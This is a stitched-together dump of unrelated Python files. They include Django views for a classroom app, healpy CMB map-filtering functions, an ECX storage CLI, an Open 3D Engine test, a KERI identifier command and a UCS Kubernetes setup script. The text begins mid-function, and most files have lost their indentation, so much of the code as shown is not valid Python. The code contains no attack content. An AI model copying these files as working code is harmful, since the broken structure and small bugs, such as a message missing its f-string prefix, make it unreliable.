'form':form,
}
return render(request,'classroom_settings.html',params)
@login_required#checked
def subjects(request, unique_id,form=None):
"""
Enlists all the subjects of a classroom ,
subjects can be added by admins
"""
classroom = get_object_or_404(Classroom,unique_id=unique_id)
if member_check(request.user,classroom):
#querysets
members = classroom.members.all()
subjects = Subject.objects.filter(classroom=classroom)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
# Admins can add a subject and assign a teacher to it
if admin_check and request.method=="POST":
form = SubjectForm(request.POST)
teacher = User.objects.get(username=request.POST.get('teacher'))
if form.is_valid():
subject=form.save(commit=False)
subject.classroom=classroom
subject.teacher = teacher
subject.save()
subject.upload_permission.add(teacher)
recipients=User.objects.filter(username__in=classroom.members.values_list('username', flat=True))
url = reverse('subjects',kwargs={'unique_id':classroom.unique_id})
notify.send(sender=request.user,verb=f"subject {subject.subject_name} added in {classroom.class_name}",
recipient=recipients,url=url)
messages.add_message(request,messages.INFO,f"A new Subject {subject.subject_name} added")
classroom.teacher.add(teacher)
return redirect(url)
else:
form = SubjectForm()
params = {
'subjects':subjects,
'form':form,
'classroom':classroom,
'is_admin':admin_check,
'members':members
}
return render(request,'subjects_list.html',params)
@login_required#checked
def notes_list(request,unique_id,subject_id,form = None):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
if member_check(request.user,classroom):
#querysets
subject = Subject.objects.get(id=subject_id)
notes = Note.objects.filter(subject_name=subject).order_by('-id')
if request.GET.get('search'):
search = request.GET.get('search')
notes = notes.filter(Q(topic__icontains=search)|Q(description__icontains=search))
query,page_range = pagination(request, notes)
upload_permission = subject.upload_permission.all().filter(username=request.user.username).exists()
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
is_teacher = admin_check or upload_permission or request.user==subject.teacher
#Add note form handling
if is_teacher:
if request.method=="POST":
form = NoteForm(request.POST,request.FILES)
                if form.is_valid():
data=form.save(commit=False)
data.subject_name = subject
data.uploaded_by = request.user
data.save()
messages.add_message(request,messages.SUCCESS,f"Your Note {data.topic} is added")
return redirect(reverse('resources',kwargs={'unique_id':classroom.unique_id,'subject_id':subject.id}))
else:
form= NoteForm()
params={
'form':form,
'subject':subject,
'classroom':classroom,
'notes':notes,
'page':query,
'page_range':page_range,
'is_teacher':is_teacher,
}
return render(request,'notes/notes_list.html',params)
@login_required#checked
def note_details(request, unique_id, subject_id, id, form = None):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
if member_check(request.user,classroom):
#queryset
subject = Subject.objects.get(id=subject_id)
note = Note.objects.get(id=id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
is_teacher = admin_check or request.user==subject.teacher or note.uploaded_by == request.user
if is_teacher:
if request.method=="POST":
form = NoteForm(request.POST,request.FILES,instance=note)
if form.is_valid():
form.file = request.POST.get('file')
form.save()
return redirect(reverse('read_note',kwargs={
'unique_id':classroom.unique_id,
'subject_id':subject.id,
'id':note.id
}))
else:
form= NoteForm(instance=note)
params={
'subject':subject,
'updateform':form,
'note':note,
'classroom':classroom,
'is_teacher': is_teacher,
'extension':extension_type(note.file)
}
return render(request,'notes/note_detail.html',params)
@login_required#checked
def note_delete(request,unique_id,subject_id,id):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
subject = get_object_or_404(Subject,id=subject_id)
    note = get_object_or_404(Note,id=id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
is_teacher = admin_check or note.uploaded_by==request.user or request.user==subject.teacher
if is_teacher:
note.delete()
note_delete_notify(request,note)
return redirect(reverse('resources',kwargs={'unique_id':classroom.unique_id,'subject_id':subject.id}))
else:
raise Http404()
@login_required#checked
def assignments_list(request ,unique_id, subject_id, form=None):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
if member_check(request.user,classroom):
subject = Subject.objects.get(id=subject_id)
assignments = Assignment.objects.filter(subject_name=subject).reverse()
search = request.GET.get('search')
if search:
assignments = assignments.filter(Q(topic__icontains=search)|Q(description__icontains=search))
query,page_range = pagination(request,assignments)
assignments=query.object_list
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
is_teacher = admin_check or subject.teacher==request.user
if is_teacher:
if request.method=="POST":
form = AssignmentForm(request.POST,request.FILES)
if form.is_valid():
assignment = form.save(commit=False)
assignment.subject_name = subject
assignment.assigned_by = request.user
assignment.save()
return redirect(reverse('assignments',kwargs=
{'unique_id':classroom.unique_id,'subject_id':subject.id,}))
else:
form= AssignmentForm()
params={
'form':form,
'subject':subject,
'classroom':classroom,
'assignments':assignments,
'page':query,
'page_range':page_range,
}
return render(request,'assignments/assignment_list.html',params)
@login_required#checked
def assignment_details(request,unique_id,subject_id,id):
updateform = form = submission = submission_object = None
classroom = Classroom.objects.get(unique_id=unique_id)
if member_check(request.user, classroom):
subject = Subject.objects.get(id=subject_id)
assignment = Assignment.objects.get(id=id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
is_teacher = admin_check or request.user==subject.teacher
if is_teacher:
if request.method=="POST":
updateform = AssignmentForm(request.POST,request.FILES,instance=assignment)
if updateform.is_valid():
updateform.save()
return redirect(reverse('assignment_page',kwargs={
'unique_id':classroom.unique_id,'subject_id':subject.id,'id':assignment.id}))
else:
updateform= AssignmentForm(instance=assignment)
#submitting assignment
else:
submission_object = Submission.objects.filter(Q(submitted_by=request.user) & Q(assignment=assignment)).first()
if request.method=="POST":
if assignment.submission_link:
form = SubmitAssignmentForm(request.POST, request.FILES,instance=submission_object)
if form.is_valid():
data=form.save(commit=False)
data.submitted_by=request.user
data.assignment= assignment
data.save()
assignment.submitted_by.add(request.user)
return redirect(reverse('assignment_page',kwargs=
{'unique_id':classroom.unique_id,'subject_id':subject.id,'id':assignment.id}))
else:
messages.add_message(request,messages.WARNING,"Submission link is closed.")
else:
form = SubmitAssignmentForm(instance=submission_object)
params={
'assignment':assignment,
'extension':extension_type(assignment.file),
'subject':subject,
'form':form,
'updateform':updateform,
'classroom':classroom,
'submissionform':form,
'submission':submission,
'submission_object':submission_object,
'is_teacher':is_teacher,
}
return render(request,'assignments/assignment_detail.html',params)
@login_required#checked
def assignment_handle(request,unique_id,subject_id,id):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
is_admin = classroom.special_permissions.filter(username = request.user.username).exists()
subject = get_object_or_404(Subject,id=subject_id)
is_teacher = request.user==subject.teacher
if is_admin or is_teacher:
assignment = Assignment.objects.get(id=id)
if request.POST.get('marks_assigned'):
id = request.POST.get('id')
submission = Submission.objects.get(id=id)
marks = request.POST.get('marks_assigned')
submission.marks_assigned = marks
submission.save()
url = reverse('assignment_page',kwargs={'unique_id':classroom.unique_id,'subject_id':subject.id,'id':assignment.id})
notify.send(sender=request.user,verb=f'You got {marks} for your assignment {assignment.topic}',recipient=submission.submitted_by,url =url)
email_marks(request,submission,assignment)
return redirect(reverse('assignment-handle',kwargs={
'unique_id':classroom.unique_id,
'subject_id':subject.id,
'id':assignment.id
}))
#list of submissions
all_submissions = Submission.objects.filter(assignment=assignment)
late_submissions = all_submissions.filter(submitted_on__gt=assignment.submission_date)
ontime_submissions = all_submissions.filter(submitted_on__lte=assignment.submission_date)
members = classroom.members.all()
teachers = classroom.teacher.all()
students = members.difference(teachers)
submitted = assignment.submitted_by.all()
not_submitted = students.difference(submitted)
if request.POST.get('send_reminder')=='1':
recepients = User.objects.filter(username__in=not_submitted.values_list('username', flat=True))
url = reverse('assignment_page',kwargs={'unique_id':classroom.unique_id,'subject_id':subject.id,'id':assignment.id})
notify.send(sender=request.user,verb=f"Reminder to submit your assignment",recipient=recepients,url=url)
send_reminder(request,assignment,not_submitted.values_list('email', flat=True))
if request.POST.get('toggle_link'):
if assignment.submission_link:
assignment.submission_link = False
else:
assignment.submission_link = True
assignment.save()
params = {
'assignment':assignment,
'all_submissions':all_submissions,
'late_submissions':late_submissions,
'ontime_submissions':ontime_submissions,
'is_teacher':is_teacher,
'submitted':submitted,
'not_submitted':not_submitted,
'subject':subject,
'classroom':classroom,
}
return render(request,'assignments/assignment_handle.html',params)
else:
raise Http404()
@login_required#checked
def assignment_delete(request,unique_id,subject_id,id):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
subject = get_object_or_404(Subject,id=subject_id)
assignment = get_object_or_404(Assignment,id=id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
is_teacher = admin_check or request.user==subject.teacher
if is_teacher:
assignment.delete()
assignment_delete_notify(request,assignment)
        return redirect(reverse('assignments',kwargs={'unique_id':classroom.unique_id,'subject_id':subject.id}))
else:
raise Http404()
@login_required#checked
def announcements_list(request, unique_id, subject_id,form = None):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
if member_check(request.user, classroom):
#querysets
subject = get_object_or_404(Subject,id=subject_id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
is_teacher = admin_check or request.user==subject.teacher
announcements = Announcement.objects.all().filter(subject_name=subject).reverse()
if request.GET.get('search'):
search = request.GET.get('search')
announcements = announcements.filter(Q(subject__icontains=search)|Q(description__icontains=search))
query,page_range = pagination(request,announcements)
announcements=query.object_list
#announcement form handling
if is_teacher:
if request.method=="POST":
form = AnnouncementForm(request.POST,request.FILES)
if form.is_valid():
announcement = form.save(commit=False)
announcement.subject_name = subject
announcement.announced_by = request.user
announcement.save()
return redirect(reverse('announcement',kwargs=
{'unique_id':classroom.unique_id,'subject_id':subject.id}))
else:
form= AnnouncementForm()
params={
'form':form,
'subject':subject,
'classroom':classroom,
'announcements':announcements,
'page':query,
'page_range':page_range,
'is_teacher':is_teacher
}
return render(request,'announcements/announcement_list.html',params)
@login_required#checked
def announcement_details(request,unique_id,subject_id,id,form = None):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
if member_check(request.user, classroom):
subject = get_object_or_404(Subject,id=subject_id)
announcement = get_object_or_404(Announcement,id=id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
is_teacher = admin_check or request.user==subject.teacher
#announcement update handling
if is_teacher:
if request.method=="POST":
form = AnnouncementForm(request.POST,request.FILES,instance=announcement)
if form.is_valid():
announcementform = form.save(commit=False)
announcementform.subject_name = subject
announcementform.save()
return redirect(reverse('announcement_page',kwargs={
'unique_id':classroom.unique_id,
'subject_id':subject.id,
'id':announcement.id
}))
else:
form= AnnouncementForm(instance=announcement)
params={
'announcement':announcement,
'extension':extension_type(announcement.file),
'subject':subject,
'updateform':form,
'classroom':classroom,
'is_teacher':is_teacher,
}
return render(request,'announcements/announcement_details.html',params)
@login_required #checked
def announcement_delete(request,unique_id,subject_id,id):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
subject = get_object_or_404(Subject,id=subject_id)
announcement = get_object_or_404(Announcement,id=id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
is_teacher = admin_check or request.user==subject.teacher
#notify
if is_teacher:
announcement.delete()
announcement_delete_notify(request,announcement)
return redirect(reverse('announcement',kwargs={
'unique_id':classroom.unique_id,
'subject_id':subject.id
}))
else:
raise Http404()
@login_required #checked
def subject_details(request,unique_id, subject_id):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
if member_check(request.user, classroom):
subject = get_object_or_404(Subject,id=subject_id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
upload_permission = subject.upload_permission.all()
members = classroom.members.all()
admins = classroom.special_permissions.all()
teachers = classroom.teacher.all()
teacher = subject.teacher
members = list((admins| members.difference(teachers)).distinct())
if teacher not in members:
members.append(teacher)
activities = Subject_activity.objects.filter(subject=subject).reverse()
query,page_range = pagination(request,activities)
activities=query.object_list
if request.method=='POST':
form = SubjectEditForm(request.POST , request.FILES,instance=subject)
if form.is_valid():
form.save()
else:
form = SubjectEditForm(instance=subject)
params={
'subject':subject,
'classroom':classroom,
'is_teacher':admin_check,
'members':members,
'upload_permissions':upload_permission,
'admins':admins,
'teacher':teacher,
'page':query,
'page_range':page_range,
'form':form
}
return render(request,'subject_details.html',params)
@login_required #checked
def delete_subject(request,unique_id, subject_id):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
subject = get_object_or_404(Subject,id=subject_id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
if admin_check:
verb = "A Subject "+subject.subject_name + " is deleted by "+ request.user.username
url =reverse('subjects',kwargs={'unique_id':classroom.unique_id})
recipient = User.objects.filter(username__in=classroom.members.values_list('username', flat=True))
notify.send(sender=request.user,verb=verb,recipient=recipient,url=url)
subject.delete()
return redirect(url)
else:
raise Http404()
@login_required #checked
def remove_member(request,unique_id,username):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
remove_this_user = get_object_or_404(User,username=username)
url = reverse('classroom_page',kwargs={'unique_id':classroom.unique_id})
if admin_check or request.user==remove_this_user:
if remove_this_user == classroom.created_by:
messages.add_message(request,messages.WARNING,"This user can't be dropped. He has created this classroom.")
return redirect(url)
classroom.members.remove(remove_this_user)
classroom.teacher.remove(remove_this_user)
classroom.special_permissions.remove(remove_this_user)
verb = f"You are removed from {classroom.class_name}"
notify.send(sender=request.user,verb=verb,recipient=remove_this_user,url='#')
if request.user==remove_this_user:
return redirect(reverse('homepage'))
else:
return redirect(url)
else:
raise Http404()
@login_required #checked
def accept_request(request,unique_id,username):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
if admin_check:
user = get_object_or_404(User,username=username)
classroom.members.add(user)
classroom.pending_members.remove(user)
user.profile.pending_invitations.remove(classroom)
url = reverse('subjects',kwargs={'unique_id':classroom.unique_id})
        verb = f'Your request to join classroom {classroom.class_name} is accepted'
notify.send(sender=request.user,verb=verb,recipient=user,url=url)
return redirect(reverse('classroom_page',kwargs={'unique_id':classroom.unique_id}))
@login_required#checked
def delete_request(request,unique_id,username):
""" If you don't want to accept the request """
classroom = get_object_or_404(Classroom,unique_id=unique_id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
if admin_check:
user = User.objects.get(username=username)
classroom.pending_members.remove(user)
verb = "Your request to join class {classroom.class_name} is rejected"
url = "#"
notify.send(sender=request.user,verb=verb,recipient=user,url=url)
return redirect(reverse('classroom_page',kwargs={'unique_id':classroom.unique_id}))
@login_required #checked
def manage_upload_permission(request,unique_id,subject_id,username):
classroom = Classroom.objects.get(unique_id=unique_id)
if member_check(request.user,classroom):
user = User.objects.get(username=username)
subject = Subject.objects.get(id=subject_id)
check = subject.upload_permission.filter(username = user.username).exists()
url = reverse('subjects',kwargs={'unique_id':classroom.unique_id})
if check:
verb = f"You can't upload notes in {subject.subject_name} of {classroom.class_name} anymore"
notify.send(sender=request.user,verb=verb,recipient=user,url = url)
subject.upload_permission.remove(user)
else:
verb = f"You got permission to upload notes in {subject.subject_name} of {classroom.class_name}"
subject.upload_permission.add(user)
notify.send(sender=request.user,verb=verb,recipient=user,url = url)
return redirect(reverse('subject_details',kwargs={'unique_id':classroom.unique_id,'subject_id':subject.id}))
@login_required#checked
def unsend_request(request,unique_id):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
if classroom in request.user.profile.pending_invitations.all():
request.user.profile.pending_invitations.remove(classroom)
classroom.pending_members.remove(request.user)
return redirect(reverse('profile',kwargs={
'username':request.user.username
}))
else:
raise Http404()
@login_required#checked
def export_marks(request,unique_id,subject_id,id):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
subject = get_object_or_404(Subject,id=subject_id)
if admin_check or request.user==subject.teacher:
assignment = get_object_or_404(Assignment,id=id)
response = HttpResponse(content_type='application/ms-excel')
response['Content-Disposition'] = f'attachment; filename="mark_sheet of {assignment.topic}.xls"'
wb = xlwt.Workbook(encoding='utf-8')
ws = wb.add_sheet('Submissions')
# Sheet header, first row
row_num = 0
font_style = xlwt.XFStyle()
font_style.font.bold = True
columns = ['Username','submitted_on','marks_obtained']
for col_num in range(len(columns)):
ws.write(row_num, col_num, columns[col_num], font_style)
# Sheet body, remaining rows
font_style = xlwt.XFStyle()
rows = Submission.objects.all().filter(assignment=assignment).values_list('submitted_by','submitted_on','marks_assigned')
rows = [[x.strftime("%Y-%m-%d %H:%M") if isinstance(x, datetime.datetime) else x for x in row] for row in rows ]
for row in rows:
row_num += 1
row[0]=str(User.objects.get(id=row[0]))
for col_num in range(len(row)):
ws.write(row_num, col_num, row[col_num], font_style)
wb.save(response)
return response
else:
raise Http404()
def features(request):
return render(request, 'features.html')
def privacy(request):
    return render(request, 'privacy.html')
import healpy as hp
import numpy as np
def iqu2teb(IQU, nside, lmax=None):
alms = hp.map2alm(IQU, lmax=lmax, pol=True)
return hp.alm2map(alms, nside=nside, lmax=lmax, pol=False)
def teb2iqu(TEB, nside, lmax=None):
alms = hp.map2alm(TEB, lmax=lmax, pol=False)
return hp.alm2map(alms, nside=nside, lmax=lmax, pol=True)
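# Hedged usage sketch (not part of the original module): round-trip a toy
# polarized map through the two helpers above. nside_demo and the random maps
# are made up for illustration.
if __name__ == "__main__":
    nside_demo = 16
    npix = hp.nside2npix(nside_demo)
    iqu_demo = np.random.standard_normal((3, npix))  # fake I, Q, U maps
    teb_demo = iqu2teb(iqu_demo, nside_demo, lmax=2 * nside_demo)
    iqu_back = teb2iqu(teb_demo, nside_demo, lmax=2 * nside_demo)
    print(np.shape(teb_demo), np.shape(iqu_back))  # both are (3, npix)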
def messenger_1(data_vec, T_pixel, n_iter, s_cov_diag_grade, nside, noise_bar_diag, noise_diag):
s = np.zeros(data_vec.shape, dtype='complex')
T_harmonic_grade = np.ones(hp.map2alm(hp.ud_grade(data_vec.real, nside),
lmax=nside * 3 - 1).shape) * T_pixel[0] / np.float(nside * nside)
harmonic_operator = (s_cov_diag_grade / (s_cov_diag_grade + T_harmonic_grade))
pixel_operator_signal = (noise_bar_diag / (noise_bar_diag + T_pixel))
pixel_operator_data = (T_pixel / (T_pixel + noise_diag))
for i in range(n_iter):
t = pixel_operator_data * data_vec + pixel_operator_signal * s
# t = hp.ud_grade(t,512)
t_alm1 = hp.map2alm(t.real, lmax=3 * nside - 1)
t_alm2 = hp.map2alm(t.imag, lmax=3 * nside - 1)
s1 = hp.alm2map(harmonic_operator * t_alm1, nside=nside, lmax=nside * 3 - 1, verbose=False)
s2 = hp.alm2map(harmonic_operator * t_alm2, nside=nside, lmax=nside * 3 - 1, verbose=False)
s = s1 + 1j * s2
# s = hp.ud_grade(s, 128)
# _ = hp.mollview(s.imag), plt.show()
print(np.var(s))
return s
def messenger_2(data_vec, s_cov_diag, T_ell, noise_diag, T_pixel, noise_bar_diag, nside, n_iter):
data_vec_QU = np.concatenate([data_vec.real, data_vec.imag])
s = np.zeros(data_vec_QU.shape, dtype='complex')
convergence_test = [0.]
harmonic_operator = s_cov_diag / (s_cov_diag + T_ell)
pixel_operator_signal = (noise_bar_diag / (noise_bar_diag + T_pixel))
pixel_operator_data = (T_pixel / (T_pixel + noise_diag))
for i in range(n_iter):
t = pixel_operator_data * data_vec_QU + pixel_operator_signal * s # here t = concat[t_Q, t_U]
t = np.real(t)
t = [t[int(t.shape[0] / 2):] * 0., t[:int(t.shape[0] / 2)], t[int(t.shape[0] / 2):]] # here t = {t_I = 0, t_Q, t_U}
t = hp.ud_grade(t, nside) # now upgrade
t_alm = hp.map2alm(t, lmax=3 * (nside) - 1, pol=True)
s = harmonic_operator * np.concatenate([t_alm[1], t_alm[2]])
s = [s[int(s.shape[0] / 2):] * 0., s[:int(s.shape[0] / 2)], s[int(s.shape[0] / 2):]]
print(np.var(s[0]), np.var(s[1]), np.var(s[2]))
convergence_test.append(np.var(s[1]))
s = hp.alm2map(s, nside=nside, lmax=nside * 3 - 1, verbose=False, pol=True)
# s_qu = np.copy(s)
s = np.concatenate([s[1], s[2]])
    return s
# Copyright 2014 Pierre de Buyl
#
# This file is part of pmi-h5py
#
# pmi-h5py is free software and is licensed under the modified BSD license (see
# LICENSE file).
import test_pmi_mod
mytest = test_pmi_mod.MyTest('myllfile.h5', 1024)
mytest.fill()
mytest.close()
| python |
#!/usr/bin/env python
#-*- mode: Python;-*-
import ConfigParser
import json
import logging
import os
import sys
import tempfile
import traceback
import click
from requests.exceptions import HTTPError
from ecxclient.sdk import client
import util
cmd_folder = os.path.abspath(os.path.join(os.path.dirname(__file__), 'commands'))
class MyCLI(click.MultiCommand):
def list_commands(self, ctx):
rv = []
for filename in os.listdir(cmd_folder):
if filename.endswith('.py') and filename.startswith('cmd_'):
rv.append(filename[4:-3])
rv.sort()
return rv
def get_command(self, ctx, name):
try:
if sys.version_info[0] == 2:
name = name.encode('ascii', 'replace')
mod = __import__('ecxclient.cli.commands.cmd_' + name, None, None, ['cli'])
except ImportError:
logging.error(traceback.format_exc())
return
return mod.cli
def get_existing_session(username):
parser = ConfigParser.RawConfigParser()
parser.read([cfgfile])
try:
return parser.get(username, 'sessionid')
except ConfigParser.NoSectionError:
raise Exception('Please provide login credentials.')
def save_config(username, sessionid):
parser = ConfigParser.RawConfigParser()
parser.add_section(username)
parser.set(username, 'sessionid', sessionid)
parser.write(open(cfgfile, 'wb'))
@click.command(cls=MyCLI)
@click.option('--url', envvar='ECX_URL', default='http://localhost:8082', metavar='URL', help='ECX url.')
@click.option('--user', envvar='ECX_USER', default='admin', metavar='USERNAME', help='ECX user.')
@click.option('--passwd', envvar='ECX_PASSWD', default=None, metavar='PASSWORD', help='ECX password.')
@click.option('--json', is_flag=True, help='Show raw json.')
@click.option('--links', is_flag=True, help='Include links in output. Implies --json option.')
@click.version_option('0.43')
@util.pass_context
def cli(ctx, url, user, passwd, json, links):
"""ecx is a command line tool with which ECX operations
can be carried out.
"""
if user and passwd:
ctx.ecx_session = client.EcxSession(url, username=user, password=passwd)
save_config(user, ctx.ecx_session.sessionid)
else:
ctx.ecx_session = client.EcxSession(url, sessionid=get_existing_session(user))
ctx.json = json
ctx.links = links
if ctx.links:
ctx.json = True
# cli = MyCLI(help='Script to perform ECX operations. ')
def init_logging():
fd, logfile = tempfile.mkstemp(suffix='.txt', prefix='ecxclient')
os.close(fd)
logging.basicConfig(filename=logfile, level=logging.DEBUG, format='%(asctime)-15s: %(levelname)s: %(message)s')
def process_http_error(e):
if not isinstance(e, HTTPError):
return
if not e.response.content:
return
logging.error(e.response.content)
try:
d = json.loads(e.response.content)
click.secho('%s (%s)' % (d.get('id', 'Unknown'), d.get('description', 'Unknown')), fg='red')
except Exception:
pass
def main():
global cfgfile
init_logging()
cfgfile = os.path.join(click.get_app_dir("ecxcli"), 'config.ini')
cfgdir = os.path.dirname(cfgfile)
if not os.path.exists(cfgdir):
os.makedirs(cfgdir)
try:
cli()
except Exception as e:
logging.error(traceback.format_exc())
exctype, value = sys.exc_info()[:2]
click.secho(traceback.format_exception_only(exctype, value)[0], fg='red')
process_http_error(e)
| python |
"""
Copyright (c) Contributors to the Open 3D Engine Project. For complete copyright and license terms please see the LICENSE at the root of this distribution.
SPDX-License-Identifier: Apache-2.0 OR MIT
"""
import unittest.mock as mock
import unittest
import time
import pytest
import ly_test_tools.environment.waiter
pytestmark = pytest.mark.SUITE_smoke
@mock.patch('time.sleep', mock.MagicMock)
class TestWaitFor(unittest.TestCase):
def test_WaitForFunctionCall_GivenExceptionTimeoutExceeded_RaiseException(self):
input_func = mock.MagicMock()
input_func.return_value = False
with self.assertRaises(Exception):
ly_test_tools.environment.waiter.wait_for(input_func, .001, Exception, 0)
def test_WaitForFunctionCall_TimeoutExceeded_RaiseAssertionError(self):
input_func = mock.MagicMock()
input_func.return_value = False
with self.assertRaises(Exception):
ly_test_tools.environment.waiter.wait_for(input_func, .001, interval=0)
def test_WaitForFunctionCall_TimeoutExceeded_EnoughTime(self):
input_func = mock.MagicMock()
input_func.return_value = False
timeout_end = time.time() + 0.1
try:
ly_test_tools.environment.waiter.wait_for(input_func, 0.1, Exception, interval=0.01)
except Exception:
pass
# It should have taken at least 1/10 second
        assert time.time() > timeout_end
# -*- encoding: utf-8 -*-
"""
keri.kli.commands module
"""
import argparse
import json
from hio.base import doing
from keri import kering
from keri.db import basing
from ... import habbing, keeping, agenting, indirecting, directing
parser = argparse.ArgumentParser(description='Create an interaction event')
parser.set_defaults(handler=lambda args: interact(args))
parser.add_argument('--name', '-n', help='Human readable reference', required=True)
parser.add_argument('--proto', '-p', help='Protocol to use when propagating ICP to witnesses [tcp|http] (defaults '
'http)', default="tcp")
parser.add_argument('--data', '-d', help='Anchor data, \'@\' allowed', default=[], action="store", required=False)
def interact(args):
"""
Performs a rotation of the identifier of the environment represented by the provided name parameter
args (parseargs): Command line argument
"""
name = args.name
if args.data is not None:
try:
if args.data.startswith("@"):
f = open(args.data[1:], "r")
data = json.load(f)
else:
data = json.loads(args.data)
except json.JSONDecodeError:
            raise kering.ConfigurationError("data supplied must be valid JSON to anchor in a seal")
if not isinstance(data, list):
data = [data]
else:
data = None
ixnDoer = InteractDoer(name=name, proto=args.proto, data=data)
doers = [ixnDoer]
try:
directing.runController(doers=doers, expire=0.0)
except kering.ConfigurationError:
print(f"identifier prefix for {name} does not exist, incept must be run first", )
return -1
except kering.ValidationError as ex:
return -1
class InteractDoer(doing.DoDoer):
"""
DoDoer that launches Doers needed to create an interaction event and publication of the event
to all appropriate witnesses
"""
def __init__(self, name, proto, data: list = None):
"""
Returns DoDoer with all registered Doers needed to perform interaction event.
Parameters:
name is human readable str of identifier
proto is tcp or http method for communicating with Witness
data is list of dicts of committed data such as seals
"""
self.name = name
self.proto = proto
self.data = data
ks = keeping.Keeper(name=self.name, temp=False) # not opened by default, doer opens
self.ksDoer = keeping.KeeperDoer(keeper=ks) # doer do reopens if not opened and closes
db = basing.Baser(name=self.name, temp=False, reload=True) # not opened by default, doer opens
self.dbDoer = basing.BaserDoer(baser=db) # doer do reopens if not opened and closes
self.hab = habbing.Habitat(name=self.name, ks=ks, db=db, temp=False, create=False)
self.habDoer = habbing.HabitatDoer(habitat=self.hab) # setup doer
doers = [self.ksDoer, self.dbDoer, self.habDoer, doing.doify(self.interactDo)]
super(InteractDoer, self).__init__(doers=doers)
def interactDo(self, tymth, tock=0.0, **opts):
"""
Returns: doifiable Doist compatible generator method
Usage:
add result of doify on this method to doers list
"""
self.wind(tymth)
self.tock = tock
_ = (yield self.tock)
msg = self.hab.interact(data=self.data)
if self.proto == "tcp":
mbx = None
witDoer = agenting.WitnessReceiptor(hab=self.hab, klas=agenting.TCPWitnesser, msg=msg)
self.extend(doers=[witDoer])
yield self.tock
else: # "http"
mbx = indirecting.MailboxDirector(hab=self.hab)
witDoer = agenting.WitnessReceiptor(hab=self.hab, klas=agenting.HTTPWitnesser, msg=msg)
self.extend(doers=[mbx, witDoer])
yield self.tock
while not witDoer.done:
_ = yield self.tock
print(f'Prefix {self.hab.pre}')
print(f'New Sequence No. {self.hab.kever.sn}')
for idx, verfer in enumerate(self.hab.kever.verfers):
print(f'\tPublic key {idx+1}: {verfer.qb64}')
toRemove = [self.ksDoer, self.dbDoer, self.habDoer, witDoer]
if mbx:
toRemove.append(mbx)
self.remove(toRemove)
return
| python |
from ucsmsdk.ucsexception import UcsException
import re, sys
# given an array and a string of numbers, make sure they are all in the array:
#
def check_values(array, csv):
indexes = csv.split(',')
for i in indexes:
try:
i = int(i) - 1
except:
print "bad value: " + i
return False
if i < 0 or i > len(array) - 1:
return False
return True
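# Hedged illustration (not from the original file): the comma-separated string
# holds 1-based indexes into the array, so for a three-element list
#   check_values(["blade1", "blade2", "blade3"], "1,3") -> True
#   check_values(["blade1", "blade2", "blade3"], "0,4") -> False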
# get the available servers to put in the pool.
def select_kube_servers(handle):
from ucsmsdk.mometa.compute.ComputeRackUnit import ComputeRackUnit
from ucsmsdk.mometa.fabric.FabricComputeSlotEp import FabricComputeSlotEp
print "Listing Available UCS Servers"
filter_string = '(presence, "equipped")'
# get blades
blades = handle.query_classid("fabricComputeSlotEp", filter_string)
# get all connected rack mount servers.
servers = handle.query_classid("computeRackUnit")
m = blades + servers
while True:
for i, s in enumerate(m):
if type(s) is FabricComputeSlotEp:
print "[%d]: Blade %s/%s type %s" % (i+1, s.chassis_id, s.rn, s.model)
if type(s) is ComputeRackUnit:
print "[%d]: Rack %s type %s" % (i+1, s.rn, s.model)
vals = raw_input("(E.g.: 2,4,8): ")
if check_values(m, vals) == True:
k8servers = [m[int(x)-1] for x in vals.split(',')]
print "Install Kubernetes on the following servers:"
for s in k8servers:
if type(s) is FabricComputeSlotEp:
print "\tBlade %s/%s type %s" % (s.chassis_id, s.rn, s.model)
if type(s) is ComputeRackUnit:
print "\tServer %s type %s" % (s.rn, s.model)
yn = raw_input("Is this correct? [N/y]: ")
if yn == "y" or yn == "Y":
return k8servers
def createKubeBootPolicy(handle):
print "Creating Kube Boot Policy"
from ucsmsdk.mometa.lsboot.LsbootPolicy import LsbootPolicy
from ucsmsdk.mometa.lsboot.LsbootVirtualMedia import LsbootVirtualMedia
from ucsmsdk.mometa.lsboot.LsbootStorage import LsbootStorage
from ucsmsdk.mometa.lsboot.LsbootLocalStorage import LsbootLocalStorage
from ucsmsdk.mometa.lsboot.LsbootDefaultLocalImage import LsbootDefaultLocalImage
    mo = LsbootPolicy(parent_mo_or_dn="org-root", name="kube", descr="Kubernetes", reboot_on_update="yes", policy_owner="local", enforce_vnic_name="yes", boot_mode="legacy")
mo_1 = LsbootVirtualMedia(parent_mo_or_dn=mo, access="read-only-remote-cimc", lun_id="0", order="2")
mo_2 = LsbootStorage(parent_mo_or_dn=mo, order="1")
mo_2_1 = LsbootLocalStorage(parent_mo_or_dn=mo_2, )
mo_2_1_1 = LsbootDefaultLocalImage(parent_mo_or_dn=mo_2_1, order="1")
handle.add_mo(mo, modify_present=True)
try:
handle.commit()
except UcsException as err:
if err.error_code == "103":
print "\talready exists"
def deleteKubeBootPolicy(handle):
